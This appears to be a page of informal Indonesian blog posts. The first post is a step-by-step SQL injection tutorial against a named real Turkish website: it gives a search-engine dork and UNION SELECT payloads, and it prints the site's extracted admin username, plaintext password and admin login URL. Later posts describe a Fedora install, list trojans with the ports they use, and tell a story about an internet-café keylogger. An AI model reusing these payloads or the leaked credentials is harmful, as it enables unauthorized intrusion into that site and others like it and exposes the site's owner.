Gag tau mungkin ini jawaban dari beberapa pertanyaan teman sy yg msh ingin coba-coba
dengan SQL Inject. ya sekedar belajar dan latihan sambil nyari-nyari yg berguna bagi diri sendiri and my big family

Ada banyak artikel di Internet yg memberikan informasi bagaimana cara meng-exploitasi situs-situs yang vulnerability, tp terkadang bagi sebagian orang yg mendapatkannya malah bingung cara penerapannya. hmmm..ini sekedar contoh saja, tp sy berharap tidak dilakukan
untuk kemaksiatan (dosa ditangan anda).

ok kita mulai :

Step 1 :
cari target di Internet dengan menggunakan search engine, masukkan keyword yg tepat misal
inurl:/devami.asp?id= geri

Step 2 :
ketemu korbannya ! sy pilih salah satu korban : http://www.istanbulplanlama.com/vz/devami.asp?id=21

Step 3 :
selanjutnya sy coba untuk membuktikan bahwa url tersebut masih vul or not dengan cara menghapus angka 21-nya. yupz, ternyata saya dapat 1 pesan error seperti ini :

Step 4 :
dari hasil diatas, selanjutnya siapkan kue + teh maniz

Step 5 :

untuk mencari username coba query dibawah ini : -21+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

ganti angka 21 diatas dengan query tersebut, sehingga menjadi :

http://www.istanbulplanlama.com/vz/devami.asp?id=
-21+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin (ditulis sebaris…)

dari query diatas sy dapatkan username nya adalah : istanbul

Step 6 :
jika username sudah dapat, selanjutnya password. input query seperti ini :

-21+union+select+0,sifre,2,3,4,5,6,7+from+admin

contoh :

http://www.istanbulplanlama.com/vz/devami.asp?
id=-21+union+select+0,sifre,2,3,4,5,6,7+from+admin (ditulis sebaris…)

binggo….! passwordnya di dapat : emelsevil96572

Step 7 :
login dengan menggunakan username dan password tersebut dengan cara masuk ke halaman admin : http://www.istanbulplanlama.com/vz/admin/kontrol.asp

Step 8 :
terserah sekarang mau ngapain yg penting, jangan pernah rusakin site punya orang. Ingat dosa !

Step 9 :
pulang shalat tahajud n mboco Qur’an

Catatan :
buat om y***o dan om b*b mudah-mudahan ini jadi step tuk belajar sec networking

Kemarin dapat kiriman cd fedora core 5 dari teman di Jakarta, ngga’ tanggung2 dikirimin dua macam 32bit n 64bit.Yang 64bit cuman bisa diinstall di kompi sy, kebetulan di BCamp yg pake pentium 4 64bit cuma sy..:).
Toh karena penasaran jadi coba instal yg 32bit aja, kebetulan ada kompi yg nganggur drpd harus bongkar SuSe yg dah lama nemenin. Sebenarnya ga ada yg istimewa dari fedora core sebelumnya paling cuma updetan soft aja koq. Tp asyik juga, walaupun agak rakus dengan memori, coz tuk GUI-nya aja butuh mem 512. Alih-alih sy mikir ngapain juga hrs ganti SuSe dengan Fedora, toh sama aja Linux juga to…he..he..he..he..

Ngga ding, sy mikir kasian juga harus bongkar SuSe yg dah lama nempel di Kompi Lino, toh banyak kenangan jalan ma “dia”.Dulu awal2 belajar Linux sy pake produk RedHat, saat itu di NKRI banyak yg gunain RedHat so banyak t4 tuk bertanya, baik dimilis ato email. SuSe saat itu merupakan barang langka n paling menyebalkan, termasuk pd diri sy sendiri (sempat ilang data 40Gb gara2 salah instal SuSe). Toh akhirnya sekitar 2005 br coba make SuSe, itupun tuk nyoba ngompile script perl. Sangat berkesan bgt dech saat itu, coz ngga’ nyangka dibalik susahnya SuSe itu terdapat keindahan didalamnya, palagi Support Systemnya yg dukung bgt. Setali tiga uang ternyata di BCamp juga server utamanya juga SuSe, jadi ga’ repot tuk sinkron dengan kompi Lino sy.

Trojan adalah program yang berjalan di dalam komputer kita tanpa kita ketahui secara pasti kehadirannya, dan juga bisa memberikan semacam akses kepada orang lain untuk menggunakan komputer tersebut dari luar (bila menggunakan internet). Walaupun secara teknisnya trojan bukan virus, tapi trojan diidentifikasikan dalam katagori yang sama dari sebuah program malicious (merusak) yang bisa berjalan di dalam komputer tanpa kita ketahui atau pengguna komputer itu sendiri. Ada beberapa tipe dari trojan. Berikut sedikit daftar trojan dan port yg biasa mereka aktifkan:

30 Agent 40421
31 Agent 31, Hackers Paradise, Masters Paradise
41 Deep Throat, Foreplay
48 DRAT
50 DRAT
58 DMSetup
59 DMSetup
79 CDK, Firehotcker
80 711 trojan (Seven Eleven), AckCmd, Back End, Back Orifice 2000
119 Happy99
121 Attack Bot, God Message, JammerKillah
123 Net Controller
133 Farnaz
137 Chode
137 (UDP) - Msinit
138 Chode
139 Chode, God Message worm, Msinit, Netlog, Network, Qaz
142 NetTaxi

Ngerinya!!! biasanya trojan memberikan akses kepada seseorang yang tidak kita kenal untuk menggunakan komputer kita melewati jaringan dimana komputer relasi kita berada, menjalankan program di dalam komputer kita, atau meng-akses data yang ada di dalam hard disk komputer kita. Bahkan untuk ngeformat komputer kitapun bisa.

Bersambung….

Ini merupakan pengalaman berharga setidaknya bagi saya pribadi. Mungkin juga bisa menjadi pelajaran bagi anda yg suka ngenet di warnet. Suatu hari ketika saya mulai sering akses internet dari warnet, karena koneksi yang ada dikantor sering lemot,letih,lesu,lalu,lalang… n sering rebutan bandwith dengan yang laen…Jadilah saya langganan warnet!

Suatu saat, saya merasa jengkel ketika hendak membuka sebuah mail saya ternyata salah password melulu. Perasaan, terakhir kali saya akses mail itu, gak ganti password kok! Akhirnya saya putuskan untuk merelakan mail saya ilang. Sedih rasanya kayak digigit GORILA.Saya sempat berpikir; ada dua kemungkinan. Saya sudah mulai linglung sehingga lupa kalau password mail saya sudah saya ganti atau ada orang yg ngecrack passwords mail saya.

Kemungkinan pertama ternyata enggak sebab saya masih ingat kok ukuran celana mantan pacar saya yg anuuu…:) berarti belom linglung khan.
Nah, kemungkinan kedua, ada yg crack password mail saya. Tapi gimana? Siapa? Akhirnya saya putuskan untuk menyelidiki kejanggalan ini. Saya datangi terus warnet itu (ga’ sah tau warnet mana), komputer yg sama saya booking… hehehe… Pas waktu itu saya ingat sesuatu!!! NETSTAT!!! Kebetulan, warnet itu pakai SO Windows. setelah saya cek! TROJAN, itu jawabannya. Ternyata ada yg merekam semua ketukan keyboard di komputer yg saya pakai saat itu. So pie donk….??? Ya ilang kabeh…preet.